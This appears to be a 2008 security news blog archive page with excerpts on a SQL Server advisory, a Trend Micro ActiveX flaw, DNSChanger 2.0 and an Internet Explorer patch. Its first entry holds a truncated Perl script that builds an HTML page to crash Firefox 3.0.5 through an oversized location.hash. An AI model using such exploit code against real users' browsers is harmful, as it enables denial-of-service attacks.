Mozilla Firefox 3.0.5 location.hash Remote Crash Exploit

Tuesday, December 23rd, 2008

#!/usr/bin/perl # mzff_lhash_dos.pl # Mozilla Firefox 3.0.5 location.hash Denial of Service Exploit # Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com] # Crash on Vista, play with it on XP $filename = $ARGV[0]; if(!defined($filename)) { print "Usage: $0 <filename.html>\n\n"; } $head = "<html>" . "\n" . "<script type=\"text/javascript\">" . "\n"; $trig = "location.hash = \"" . "A" x 20000000 . "\";" ...

Posted in Coding, Internet, Security | No Comments

Microsoft confirms critical SQL Server vulnerability

Monday, December 22nd, 2008

Microsoft late Monday issued a pre-patch advisory confirming a remote code execution vulnerability affecting its SQL Server line. The vulnerability, publicly disclosed with exploit code more than two weeks ago, affects Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2005 Express Edition, Microsoft SQL Server 2000 Desktop Engine ...

Posted in Coding, Internet, Networking, Privacy, Security, Software, Windows | No Comments

Researchers sound alarm about bug in free antivirus scanner

Monday, December 22nd, 2008

A bug in Trend Micro's free online virus scanning service can be used by hackers to hijack Windows PCs running Internet Explorer, security researchers warned. Attackers able to dupe users into visiting a malicious Web page could exploit a vulnerability in the custom ActiveX control that Trend Micro distributes to users ...

Posted in Coding, Internet, Security | No Comments

DNSChanger 2.0

Sunday, December 21st, 2008

DNS Changer 2.0 (Trojan.Flush.M) is the next –in the wild- variant of this famous malware. Now the strategy has been changed, no need to modify the DNS settings on ADSL routers. Instead it will install a network driver (NDISProt.sys) which allows the malware to send/receive raw Ethernet packets. Such approach ...

Posted in Internet, Networking, Privacy, Security | No Comments

Hackers find new crack in Windows

Saturday, December 20th, 2008

Microsoft Corp. rushed out an emergency patch Wednesday to fix a major security flaw in its Internet Explorer Web browser that has allowed hackers to infect millions of computers with viruses and steal personal information. So far, the vulnerability has not led to the widespread infections common a few years ago. ...

Posted in Internet, Privacy, Security, Windows | No Comments

Previous Entries
Copyright 2008-2009 PC Sympathy - Entries (RSS) - Comments (RSS) - Sitemap